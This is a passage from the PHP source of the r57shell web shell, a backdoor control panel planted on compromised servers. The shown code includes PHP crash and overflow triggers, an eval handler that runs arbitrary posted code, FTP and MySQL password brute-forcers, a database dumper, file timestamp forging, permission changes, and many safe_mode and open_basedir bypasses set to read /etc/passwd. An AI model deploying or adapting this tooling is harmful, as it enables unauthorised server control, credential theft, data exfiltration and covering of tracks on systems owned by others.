6068 $buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP);
6069
6070 break;
6071
6072 case 'dos34':
6073
6074 if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);}
6075
6076 break;
6077
6078 case 'dos35':
6079
6080 $a = str_repeat("/", 4199000); iconv(1, $a, 1);
6081
6082 break;
6083
6084 case 'dos36':
6085
6086 $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a);
6087
6088 break;
6089
6090 case 'dos37':
6091
6092 $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a);
6093
6094 break;
6095
6096 case 'dos38':
6097
6098 $a = str_repeat("/", 9791999); iconv_strlen(1, $a);
6099
6100 break;
6101
6102}
6103
6104
6105
6106if ($_POST['cmd']=="php_eval"){
6107
6108 $eval = @str_replace("<?","",$_POST['php_eval']);
6109
6110 $eval = @str_replace("?>","",$eval);
6111
6112 @eval($eval);}
6113
6114
6115
6116if ($_POST['cmd']=="ftp_brute")
6117
6118 {
6119
6120 $suc = 0;
6121
6122 if($_POST['brute_method']=='passwd'){
6123
6124 foreach($users as $user)
6125
6126 {
6127
6128 $connection = @ftp_connect($ftp_server,$ftp_port,10);
6129
6130 if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
6131
6132 else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
6133
6134 @ftp_close($connection);
6135
6136 }
6137
6138 }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){
6139
6140 foreach($users as $user)
6141
6142 {
6143
6144 $connection = @ftp_connect($ftp_server,$ftp_port,10);
6145
6146 if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }
6147
6148 @ftp_close($connection);
6149
6150 }
6151
6152 }
6153
6154 echo "\r\n-------------------------------------\r\n";
6155
6156 $count = count($users);
6157
6158 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
6159
6160 echo $lang[$language.'_text97'].$count."\r\n";
6161
6162 echo $lang[$language.'_text98'].$suc."\r\n";
6163
6164 }
6165
6166
6167
6168if ($_POST['cmd']=="db_brute")
6169
6170 {
6171
6172 $suc = 0;
6173
6174 if($_POST['brute_method']=='passwd'){
6175
6176 foreach($users as $user)
6177
6178 {
6179
6180 $sql = new my_sql();
6181
6182 $sql->db = $_POST['db'];
6183
6184 $sql->host = $_POST['db_server'];
6185
6186 $sql->port = $_POST['db_port'];
6187
6188 $sql->user = $user;
6189
6190 $sql->pass = $user;
6191
6192 if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }
6193
6194 }
6195
6196 if(isset($_POST['reverse']))
6197
6198 {
6199
6200 foreach($users as $user)
6201
6202 {
6203
6204 $sql = new my_sql();
6205
6206 $sql->db = $_POST['db'];
6207
6208 $sql->host = $_POST['db_server'];
6209
6210 $sql->port = $_POST['db_port'];
6211
6212 $sql->user = $user;
6213
6214 $sql->pass = strrev($user);
6215
6216 if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }
6217
6218 }
6219
6220 }
6221
6222 }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){
6223
6224 foreach($users as $user)
6225
6226 {
6227
6228 $sql = new my_sql();
6229
6230 $sql->db = $_POST['db'];
6231
6232 $sql->host = $_POST['db_server'];
6233
6234 $sql->port = $_POST['db_port'];
6235
6236 $sql->user = $_POST['mysql_l'];
6237
6238 $sql->pass = $user;
6239
6240 if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }
6241
6242 }
6243
6244 }
6245
6246 echo "\r\n-------------------------------------\r\n";
6247
6248 $count = count($users);
6249
6250 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
6251
6252 echo $lang[$language.'_text97'].$count."\r\n";
6253
6254 echo $lang[$language.'_text98'].$suc."\r\n";
6255
6256 }
6257
6258
6259
6260if ($_POST['cmd']=="mysql_dump")
6261
6262 {
6263
6264 if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); }
6265
6266 $sql = new my_sql();
6267
6268 $sql->db = $_POST['db'];
6269
6270 $sql->host = $_POST['db_server'];
6271
6272 $sql->port = $_POST['db_port'];
6273
6274 $sql->user = $_POST['mysql_l'];
6275
6276 $sql->pass = $_POST['mysql_p'];
6277
6278 $sql->base = $_POST['mysql_db'];
6279
6280 if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
6281
6282 else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
6283
6284 else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
6285
6286 else {
6287
6288 if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
6289
6290 else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} }
6291
6292 else { echo "[-] ERROR! Can't write in dump file"; }
6293
6294 }
6295
6296 }
6297
6298
6299
6300echo "</textarea></div>";
6301
6302echo "</b>";
6303
6304echo "</td></tr></table>";
6305
6306echo "<table width=100% cellpadding=0 cellspacing=0>";
6307
6308
6309
6310function div_title($title, $id)
6311
6312{
6313
6314 return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
6315
6316}
6317
6318function div($id)
6319
6320 {
6321
6322 if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">';
6323
6324 $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38','id39');
6325
6326 if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">';
6327
6328 return '<div id="'.$id.'">';
6329
6330 }
6331
6332
6333
6334if(!$safe_mode){
6335
6336echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
6337
6338echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
6339
6340echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6341
6342echo $te.'</div>'.$table_end1.$fe;
6343
6344}
6345
6346else{
6347
6348echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
6349
6350echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
6351
6352echo $te.'</div>'.$table_end1.$fe;
6353
6354}
6355
6356echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
6357
6358echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
6359
6360echo $te.'</div>'.$table_end1.$fe;
6361
6362
6363
6364if($safe_mode || $open_basedir){
6365
6366echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
6367
6368echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
6369
6370echo $te.'</div>'.$table_end1.$fe;
6371
6372}
6373
6374
6375
6376if($unix && @function_exists('touch')){
6377
6378echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
6379
6380echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($_SERVER["SCRIPT_FILENAME"])))
6381
6382.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"
6383
6384.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
6385
6386echo sr(15,"<b> or set Day".$arrow."</b>",
6387
6388'
6389
6390<select name="day" size="1">
6391
6392<option value="01">1</option>
6393
6394<option value="02">2</option>
6395
6396<option value="03">3</option>
6397
6398<option value="04">4</option>
6399
6400<option value="05">5</option>
6401
6402<option value="06">6</option>
6403
6404<option value="07">7</option>
6405
6406<option value="08">8</option>
6407
6408<option value="09">9</option>
6409
6410<option value="10">10</option>
6411
6412<option value="11">11</option>
6413
6414<option value="12">12</option>
6415
6416<option value="13">13</option>
6417
6418<option value="14">14</option>
6419
6420<option value="15">15</option>
6421
6422<option value="16">16</option>
6423
6424<option value="17">17</option>
6425
6426<option value="18">18</option>
6427
6428<option value="19">19</option>
6429
6430<option value="20">20</option>
6431
6432<option value="21">21</option>
6433
6434<option value="22">22</option>
6435
6436<option value="23">23</option>
6437
6438<option value="24">24</option>
6439
6440<option value="25">25</option>
6441
6442<option value="26">26</option>
6443
6444<option value="27">27</option>
6445
6446<option value="28">28</option>
6447
6448<option value="29">29</option>
6449
6450<option value="30">30</option>
6451
6452<option value="31">31</option>
6453
6454</select>'
6455
6456.ws(4)."<b>Month".$arrow."</b>"
6457
6458.'
6459
6460<select name="month" size="1">
6461
6462<option value="January">January</option>
6463
6464<option value="February">February</option>
6465
6466<option value="March">March</option>
6467
6468<option value="April">April</option>
6469
6470<option value="May">May</option>
6471
6472<option value="June">June</option>
6473
6474<option value="July">July</option>
6475
6476<option value="August">August</option>
6477
6478<option value="September">September</option>
6479
6480<option value="October">October</option>
6481
6482<option value="November">November</option>
6483
6484<option value="December">December</option>
6485
6486</select>'
6487
6488.ws(4)."<b>Year".$arrow."</b>"
6489
6490.'
6491
6492<select name="year" size="1">
6493
6494<option value="1998">1998</option>
6495
6496<option value="1999">1999</option>
6497
6498<option value="2000">2000</option>
6499
6500<option value="2001">2001</option>
6501
6502<option value="2002">2002</option>
6503
6504<option value="2003">2003</option>
6505
6506<option value="2004">2004</option>
6507
6508<option value="2005">2005</option>
6509
6510<option value="2006">2006</option>
6511
6512<option value="2006">2007</option>
6513
6514<option value="2006">2008</option>
6515
6516<option value="2006">2009</option>
6517
6518<option value="2006">2010</option>
6519
6520</select>'
6521
6522.ws(4)."<b>Hour".$arrow."</b>"
6523
6524.'
6525
6526<select name="chasi" size="1">
6527
6528<option value="01">01</option>
6529
6530<option value="02">02</option>
6531
6532<option value="03">03</option>
6533
6534<option value="04">04</option>
6535
6536<option value="05">05</option>
6537
6538<option value="06">06</option>
6539
6540<option value="07">07</option>
6541
6542<option value="08">08</option>
6543
6544<option value="09">09</option>
6545
6546<option value="10">10</option>
6547
6548<option value="11">11</option>
6549
6550<option value="12">12</option>
6551
6552<option value="13">13</option>
6553
6554<option value="14">14</option>
6555
6556<option value="15">15</option>
6557
6558<option value="16">16</option>
6559
6560<option value="17">17</option>
6561
6562<option value="18">18</option>
6563
6564<option value="19">19</option>
6565
6566<option value="20">20</option>
6567
6568<option value="21">21</option>
6569
6570<option value="22">22</option>
6571
6572<option value="23">23</option>
6573
6574<option value="24">24</option>
6575
6576</select>'
6577
6578.ws(4)."<b>Minute".$arrow."</b>"
6579
6580.'
6581
6582<select name="minutes" size="1">
6583
6584<option value="01">1</option>
6585
6586<option value="02">2</option>
6587
6588<option value="03">3</option>
6589
6590<option value="04">4</option>
6591
6592<option value="05">5</option>
6593
6594<option value="06">6</option>
6595
6596<option value="07">7</option>
6597
6598<option value="08">8</option>
6599
6600<option value="09">9</option>
6601
6602<option value="10">10</option>
6603
6604<option value="11">11</option>
6605
6606<option value="12">12</option>
6607
6608<option value="13">13</option>
6609
6610<option value="14">14</option>
6611
6612<option value="15">15</option>
6613
6614<option value="16">16</option>
6615
6616<option value="17">17</option>
6617
6618<option value="18">18</option>
6619
6620<option value="19">19</option>
6621
6622<option value="20">20</option>
6623
6624<option value="21">21</option>
6625
6626<option value="22">22</option>
6627
6628<option value="23">23</option>
6629
6630<option value="24">24</option>
6631
6632<option value="25">25</option>
6633
6634<option value="26">26</option>
6635
6636<option value="27">27</option>
6637
6638<option value="28">28</option>
6639
6640<option value="29">29</option>
6641
6642<option value="30">30</option>
6643
6644<option value="31">31</option>
6645
6646<option value="32">32</option>
6647
6648<option value="33">33</option>
6649
6650<option value="34">34</option>
6651
6652<option value="35">35</option>
6653
6654<option value="36">36</option>
6655
6656<option value="37">37</option>
6657
6658<option value="38">38</option>
6659
6660<option value="39">39</option>
6661
6662<option value="40">40</option>
6663
6664<option value="41">41</option>
6665
6666<option value="42">42</option>
6667
6668<option value="43">43</option>
6669
6670<option value="44">44</option>
6671
6672<option value="45">45</option>
6673
6674<option value="46">46</option>
6675
6676<option value="47">47</option>
6677
6678<option value="48">48</option>
6679
6680<option value="49">49</option>
6681
6682<option value="50">50</option>
6683
6684<option value="51">51</option>
6685
6686<option value="52">52</option>
6687
6688<option value="53">53</option>
6689
6690<option value="54">54</option>
6691
6692<option value="55">55</option>
6693
6694<option value="56">56</option>
6695
6696<option value="57">57</option>
6697
6698<option value="58">58</option>
6699
6700<option value="59">59</option>
6701
6702</select>'
6703
6704.ws(4)."<b>Second".$arrow."</b>"
6705
6706.'
6707
6708<select name="second" size="1">
6709
6710<option value="01">1</option>
6711
6712<option value="02">2</option>
6713
6714<option value="03">3</option>
6715
6716<option value="04">4</option>
6717
6718<option value="05">5</option>
6719
6720<option value="06">6</option>
6721
6722<option value="07">7</option>
6723
6724<option value="08">8</option>
6725
6726<option value="09">9</option>
6727
6728<option value="10">10</option>
6729
6730<option value="11">11</option>
6731
6732<option value="12">12</option>
6733
6734<option value="13">13</option>
6735
6736<option value="14">14</option>
6737
6738<option value="15">15</option>
6739
6740<option value="16">16</option>
6741
6742<option value="17">17</option>
6743
6744<option value="18">18</option>
6745
6746<option value="19">19</option>
6747
6748<option value="20">20</option>
6749
6750<option value="21">21</option>
6751
6752<option value="22">22</option>
6753
6754<option value="23">23</option>
6755
6756<option value="24">24</option>
6757
6758<option value="25">25</option>
6759
6760<option value="26">26</option>
6761
6762<option value="27">27</option>
6763
6764<option value="28">28</option>
6765
6766<option value="29">29</option>
6767
6768<option value="30">30</option>
6769
6770<option value="31">31</option>
6771
6772<option value="32">32</option>
6773
6774<option value="33">33</option>
6775
6776<option value="34">34</option>
6777
6778<option value="35">35</option>
6779
6780<option value="36">36</option>
6781
6782<option value="37">37</option>
6783
6784<option value="38">38</option>
6785
6786<option value="39">39</option>
6787
6788<option value="40">40</option>
6789
6790<option value="41">41</option>
6791
6792<option value="42">42</option>
6793
6794<option value="43">43</option>
6795
6796<option value="44">44</option>
6797
6798<option value="45">45</option>
6799
6800<option value="46">46</option>
6801
6802<option value="47">47</option>
6803
6804<option value="48">48</option>
6805
6806<option value="49">49</option>
6807
6808<option value="50">50</option>
6809
6810<option value="51">51</option>
6811
6812<option value="52">52</option>
6813
6814<option value="53">53</option>
6815
6816<option value="54">54</option>
6817
6818<option value="55">55</option>
6819
6820<option value="56">56</option>
6821
6822<option value="57">57</option>
6823
6824<option value="58">58</option>
6825
6826<option value="59">59</option>
6827
6828</select>'
6829
6830.in('hidden','cmd',0,'touch')
6831
6832.in('hidden','dir',0,$dir)
6833
6834.ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6835
6836echo $te.'</div>'.$table_end1.$fe;
6837
6838}
6839
6840
6841
6842$select='';
6843
6844if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}
6845
6846if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}
6847
6848if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}
6849
6850if($unix && $select){
6851
6852echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
6853
6854echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($_SERVER["SCRIPT_FILENAME"]))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6855
6856echo $te.'</div>'.$table_end1.$fe;
6857
6858}
6859
6860
6861
6862if(!$safe_mode){
6863
6864$aliases2 = '';
6865
6866foreach ($aliases as $alias_name=>$alias_cmd)
6867
6868 {
6869
6870 $aliases2 .= "<option>$alias_name</option>";
6871
6872 }
6873
6874echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
6875
6876echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6877
6878echo $te.'</div>'.$table_end1.$fe;
6879
6880}
6881
6882
6883
6884echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
6885
6886echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
6887
6888echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
6889
6890echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
6891
6892echo $te.'</div>'.$table_end1.$fe;
6893
6894
6895
6896if(!$safe_mode && $unix){
6897
6898echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
6899
6900echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
6901
6902echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
6903
6904echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
6905
6906echo $te.'</div>'.$table_end1.$fe;
6907
6908}
6909
6910
6911
6912echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
6913
6914echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";
6915
6916echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
6917
6918echo "</textarea>";
6919
6920echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
6921
6922echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
6923
6924echo "</div></div></font>";
6925
6926echo $table_end1.$fe;
6927
6928
6929
6930if($safe_mode || $open_basedir)
6931
6932{
6933
6934echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
6935
6936echo "<table class=table1 width=100% align=center>";
6937
6938echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6939
6940echo $te.'</div>'.$table_end1.$fe;
6941
6942}
6943
6944
6945
6946if(($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(),"5.2.0")<=0)
6947
6948{
6949
6950echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
6951
6952echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6953
6954echo $te.'</div>'.$table_end1.$fe;
6955
6956}
6957
6958
6959
6960if(($safe_mode || $open_basedir) && $mysql_on)
6961
6962{
6963
6964echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
6965
6966echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
6967
6968echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6969
6970echo $te.'</div>'.$table_end1.$fe;
6971
6972}
6973
6974
6975
6976if(($safe_mode || $open_basedir) && $mysqli_on)
6977
6978{
6979
6980echo $fs.$table_up1.div_title($lang[$language.'_text144'],'id40').$table_up2.div('id40').$ts;
6981
6982echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test19_md',15,(!empty($_POST['test19_md'])?($_POST['test19_md']):("mysqli"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test19_ml',15,(!empty($_POST['test19_ml'])?($_POST['test19_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text39'].$arrow."</b>".in('text','test19_mp',15,(!empty($_POST['test19_mp'])?($_POST['test19_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test19_port',15,(!empty($_POST['test19_port'])?($_POST['test19_port']):("3306"))));
6983
6984echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19_file',96,(!empty($_POST['test19_file'])?($_POST['test19_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test19').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6985
6986echo $te.'</div>'.$table_end1.$fe;
6987
6988}
6989
6990
6991
6992if(($safe_mode || $open_basedir) && $mssql_on)
6993
6994{
6995
6996echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
6997
6998echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
6999
7000echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7001
7002echo $te.'</div>'.$table_end1.$fe;
7003
7004}
7005
7006
7007
7008
7009
7010if(($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(),"5.2.0")<=0){
7011
7012echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
7013
7014echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7015
7016echo $te.'</div>'.$table_end1.$fe;
7017
7018}
7019
7020
7021
7022if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(),"5.2.0")<=0){
7023
7024echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
7025
7026echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7027
7028echo $te.'</div>'.$table_end1.$fe;
7029
7030}
7031
7032
7033
7034if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(),"5.2.0")<=0){
7035
7036echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
7037
7038echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7039
7040echo $te.'</div>'.$table_end1.$fe;
7041
7042}
7043
7044
7045
7046if(($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(),"5.2.0")<=0)
7047
7048{
7049
7050echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
7051
7052echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
7053
7054echo sr(15,"<b>".$lang[$language.'_text117'].ws(2).$lang[$language.'_text60'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7055
7056echo $te.'</div>'.$table_end1.$fe;
7057
7058}
7059
7060
7061
7062if(($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(),"5.2.0")<=0){
7063
7064echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
7065
7066echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7067
7068echo $te.'</div>'.$table_end1.$fe;
7069
7070}
7071
7072
7073
7074if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.0.0")<0){
7075
7076echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
7077
7078echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7079
7080echo $te.'</div>'.$table_end1.$fe;
7081
7082}
7083
7084
7085
7086if(($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(),"5.2.2")<=0){
7087
7088echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
7089
7090echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test_global'])?($_POST['test_global']):($dir))).in('hidden','cmd',0,'safe_dir').in('hidden','glob',0,'glob').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7091
7092echo $te.'</div>'.$table_end1.$fe;
7093
7094}
7095
7096
7097
7098if(($safe_mode || $open_basedir) && @function_exists('realpath') && @version_compare(@phpversion(),"5.2.4")<=0){
7099
7100$select_n_rlph = "<select name='n_rlph'><option value=1>[ 1 ] (<<0,01 sec)</option><option value=2>[ 2 ] (<0,01 sec)</option>".
7101
7102"<option value=3 selected>[ 3 ] (<1 sec (default))</option>".
7103
7104"<option value=4>[ 4 ] (<10 sec)</option><option value=5>[ 5 ] (>100 sec (danger))</option><option value=6>[ 6 ] (>>100 sec (danger))</option></select>";
7105
7106echo $fs.$table_up1.div_title($lang[$language.'_text145'],'id41').$table_up2.div('id41').$ts;
7107
